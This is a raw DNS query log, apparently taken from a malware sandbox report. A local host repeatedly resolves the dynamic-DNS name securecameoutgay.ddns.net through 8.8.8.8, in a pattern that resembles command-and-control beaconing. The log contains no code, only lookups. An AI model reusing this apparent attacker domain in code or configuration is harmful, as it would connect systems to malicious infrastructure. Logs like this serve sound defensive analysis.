                                                    Oct 12, 2024 23:05:44.549077988 CEST192.168.2.148.8.8.80x674dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.556041956 CEST192.168.2.148.8.8.80x674dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.563440084 CEST192.168.2.148.8.8.80x674dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.570837021 CEST192.168.2.148.8.8.80x3d06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.579545975 CEST192.168.2.148.8.8.80x3d06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.585967064 CEST192.168.2.148.8.8.80x3d06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.592623949 CEST192.168.2.148.8.8.80x3d06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.599703074 CEST192.168.2.148.8.8.80x3d06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.606364965 CEST192.168.2.148.8.8.80x6ca5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.613595963 CEST192.168.2.148.8.8.80x6ca5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.620589972 CEST192.168.2.148.8.8.80x6ca5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.627693892 CEST192.168.2.148.8.8.80x6ca5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.634790897 CEST192.168.2.148.8.8.80x6ca5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.641848087 CEST192.168.2.148.8.8.80xbf1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.648385048 CEST192.168.2.148.8.8.80xbf1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.655302048 CEST192.168.2.148.8.8.80xbf1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.662626028 CEST192.168.2.148.8.8.80xbf1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.669821024 CEST192.168.2.148.8.8.80xbf1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.676734924 CEST192.168.2.148.8.8.80xfda7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.683669090 CEST192.168.2.148.8.8.80xfda7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.690180063 CEST192.168.2.148.8.8.80xfda7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.697051048 CEST192.168.2.148.8.8.80xfda7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.704082012 CEST192.168.2.148.8.8.80xfda7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.711081028 CEST192.168.2.148.8.8.80x434fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.717775106 CEST192.168.2.148.8.8.80x434fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.725251913 CEST192.168.2.148.8.8.80x434fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.732666016 CEST192.168.2.148.8.8.80x434fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.739516020 CEST192.168.2.148.8.8.80x434fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.750185966 CEST192.168.2.148.8.8.80x4f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.757200956 CEST192.168.2.148.8.8.80x4f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.763895988 CEST192.168.2.148.8.8.80x4f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.770679951 CEST192.168.2.148.8.8.80x4f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.777292013 CEST192.168.2.148.8.8.80x4f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.784151077 CEST192.168.2.148.8.8.80x7c59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.790893078 CEST192.168.2.148.8.8.80x7c59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.797699928 CEST192.168.2.148.8.8.80x7c59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.804385900 CEST192.168.2.148.8.8.80x7c59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.811342001 CEST192.168.2.148.8.8.80x7c59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.818201065 CEST192.168.2.148.8.8.80x605bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.824948072 CEST192.168.2.148.8.8.80x605bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.832129955 CEST192.168.2.148.8.8.80x605bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.839735031 CEST192.168.2.148.8.8.80x605bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.846329927 CEST192.168.2.148.8.8.80x605bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.853262901 CEST192.168.2.148.8.8.80x80bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.860403061 CEST192.168.2.148.8.8.80x80bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.867132902 CEST192.168.2.148.8.8.80x80bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.873899937 CEST192.168.2.148.8.8.80x80bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.880861044 CEST192.168.2.148.8.8.80x80bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.888734102 CEST192.168.2.148.8.8.80x9924Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.895859957 CEST192.168.2.148.8.8.80x9924Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.902692080 CEST192.168.2.148.8.8.80x9924Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.909656048 CEST192.168.2.148.8.8.80x9924Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.918725967 CEST192.168.2.148.8.8.80x9924Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.925452948 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.932481050 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.939182997 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.945822001 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.952531099 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.959415913 CEST192.168.2.148.8.8.80x344fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.966116905 CEST192.168.2.148.8.8.80x344fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.973041058 CEST192.168.2.148.8.8.80x344fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.979693890 CEST192.168.2.148.8.8.80x344fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.986526012 CEST192.168.2.148.8.8.80x344fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.993840933 CEST192.168.2.148.8.8.80xb5a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.001092911 CEST192.168.2.148.8.8.80xb5a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.010286093 CEST192.168.2.148.8.8.80xb5a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.017630100 CEST192.168.2.148.8.8.80xb5a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.024116039 CEST192.168.2.148.8.8.80xb5a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.030647993 CEST192.168.2.148.8.8.80x3857Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.037623882 CEST192.168.2.148.8.8.80x3857Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.044341087 CEST192.168.2.148.8.8.80x3857Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.051682949 CEST192.168.2.148.8.8.80x3857Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.059382915 CEST192.168.2.148.8.8.80x3857Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.066160917 CEST192.168.2.148.8.8.80x9174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.072871923 CEST192.168.2.148.8.8.80x9174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.079988003 CEST192.168.2.148.8.8.80x9174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.086765051 CEST192.168.2.148.8.8.80x9174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.093461990 CEST192.168.2.148.8.8.80x9174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.100651979 CEST192.168.2.148.8.8.80xa607Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.107326984 CEST192.168.2.148.8.8.80xa607Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.114195108 CEST192.168.2.148.8.8.80xa607Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.120949030 CEST192.168.2.148.8.8.80xa607Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.128016949 CEST192.168.2.148.8.8.80xa607Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.134699106 CEST192.168.2.148.8.8.80x5257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.141346931 CEST192.168.2.148.8.8.80x5257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.148185015 CEST192.168.2.148.8.8.80x5257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.154882908 CEST192.168.2.148.8.8.80x5257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.161612988 CEST192.168.2.148.8.8.80x5257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.168469906 CEST192.168.2.148.8.8.80xb2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.175268888 CEST192.168.2.148.8.8.80xb2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.181979895 CEST192.168.2.148.8.8.80xb2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.188848019 CEST192.168.2.148.8.8.80xb2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.195308924 CEST192.168.2.148.8.8.80xb2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.201833963 CEST192.168.2.148.8.8.80xab78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.208662987 CEST192.168.2.148.8.8.80xab78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.215512991 CEST192.168.2.148.8.8.80xab78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.222223043 CEST192.168.2.148.8.8.80xab78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.229029894 CEST192.168.2.148.8.8.80xab78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.235838890 CEST192.168.2.148.8.8.80x26b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.242599010 CEST192.168.2.148.8.8.80x26b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.249901056 CEST192.168.2.148.8.8.80x26b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.256863117 CEST192.168.2.148.8.8.80x26b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.263725996 CEST192.168.2.148.8.8.80x26b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.270780087 CEST192.168.2.148.8.8.80x1182Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.277751923 CEST192.168.2.148.8.8.80x1182Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.284919977 CEST192.168.2.148.8.8.80x1182Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.292069912 CEST192.168.2.148.8.8.80x1182Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.300436020 CEST192.168.2.148.8.8.80x1182Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.307049036 CEST192.168.2.148.8.8.80x4b24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.313877106 CEST192.168.2.148.8.8.80x4b24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.320631027 CEST192.168.2.148.8.8.80x4b24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.327785969 CEST192.168.2.148.8.8.80x4b24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.334666014 CEST192.168.2.148.8.8.80x4b24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.341447115 CEST192.168.2.148.8.8.80xd0f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.348161936 CEST192.168.2.148.8.8.80xd0f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.354722977 CEST192.168.2.148.8.8.80xd0f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.361814022 CEST192.168.2.148.8.8.80xd0f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.368458033 CEST192.168.2.148.8.8.80xd0f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.375288010 CEST192.168.2.148.8.8.80x7635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.382049084 CEST192.168.2.148.8.8.80x7635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.388947964 CEST192.168.2.148.8.8.80x7635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.395598888 CEST192.168.2.148.8.8.80x7635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.402672052 CEST192.168.2.148.8.8.80x7635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.409584045 CEST192.168.2.148.8.8.80x27a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.416546106 CEST192.168.2.148.8.8.80x27a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.423306942 CEST192.168.2.148.8.8.80x27a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.430135965 CEST192.168.2.148.8.8.80x27a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.436973095 CEST192.168.2.148.8.8.80x27a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.443844080 CEST192.168.2.148.8.8.80xf600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.450751066 CEST192.168.2.148.8.8.80xf600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.457648039 CEST192.168.2.148.8.8.80xf600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.464415073 CEST192.168.2.148.8.8.80xf600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.471298933 CEST192.168.2.148.8.8.80xf600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.477998018 CEST192.168.2.148.8.8.80xaabaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.484844923 CEST192.168.2.148.8.8.80xaabaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.491679907 CEST192.168.2.148.8.8.80xaabaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.498338938 CEST192.168.2.148.8.8.80xaabaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.505337000 CEST192.168.2.148.8.8.80xaabaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.512005091 CEST192.168.2.148.8.8.80x10b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.518690109 CEST192.168.2.148.8.8.80x10b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.525592089 CEST192.168.2.148.8.8.80x10b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.532473087 CEST192.168.2.148.8.8.80x10b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.539839029 CEST192.168.2.148.8.8.80x10b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.546797991 CEST192.168.2.148.8.8.80x1436Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.553631067 CEST192.168.2.148.8.8.80x1436Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.560333967 CEST192.168.2.148.8.8.80x1436Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.568578959 CEST192.168.2.148.8.8.80x1436Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.575201988 CEST192.168.2.148.8.8.80x1436Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.582068920 CEST192.168.2.148.8.8.80xab9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.588754892 CEST192.168.2.148.8.8.80xab9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.595308065 CEST192.168.2.148.8.8.80xab9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.602353096 CEST192.168.2.148.8.8.80xab9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.609430075 CEST192.168.2.148.8.8.80xab9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.616218090 CEST192.168.2.148.8.8.80x182eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.622812986 CEST192.168.2.148.8.8.80x182eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.631732941 CEST192.168.2.148.8.8.80x182eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.638552904 CEST192.168.2.148.8.8.80x182eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.645320892 CEST192.168.2.148.8.8.80x182eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.652406931 CEST192.168.2.148.8.8.80x6c0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.659431934 CEST192.168.2.148.8.8.80x6c0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.666147947 CEST192.168.2.148.8.8.80x6c0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.672775984 CEST192.168.2.148.8.8.80x6c0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.679259062 CEST192.168.2.148.8.8.80x6c0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.686331034 CEST192.168.2.148.8.8.80x6556Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.693080902 CEST192.168.2.148.8.8.80x6556Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.699745893 CEST192.168.2.148.8.8.80x6556Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.706525087 CEST192.168.2.148.8.8.80x6556Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.713196993 CEST192.168.2.148.8.8.80x6556Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.719949007 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.726789951 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.733717918 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.740500927 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.747539997 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.754038095 CEST192.168.2.148.8.8.80x847eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.760746956 CEST192.168.2.148.8.8.80x847eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.767519951 CEST192.168.2.148.8.8.80x847eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.774353981 CEST192.168.2.148.8.8.80x847eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.781267881 CEST192.168.2.148.8.8.80x847eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.787791014 CEST192.168.2.148.8.8.80x3968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.794291019 CEST192.168.2.148.8.8.80x3968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.800873995 CEST192.168.2.148.8.8.80x3968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.807441950 CEST192.168.2.148.8.8.80x3968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.814115047 CEST192.168.2.148.8.8.80x3968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.820890903 CEST192.168.2.148.8.8.80x5e83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.827536106 CEST192.168.2.148.8.8.80x5e83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.834422112 CEST192.168.2.148.8.8.80x5e83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.841264009 CEST192.168.2.148.8.8.80x5e83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:45.847991943 CEST192.168.2.148.8.8.80x5e83Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
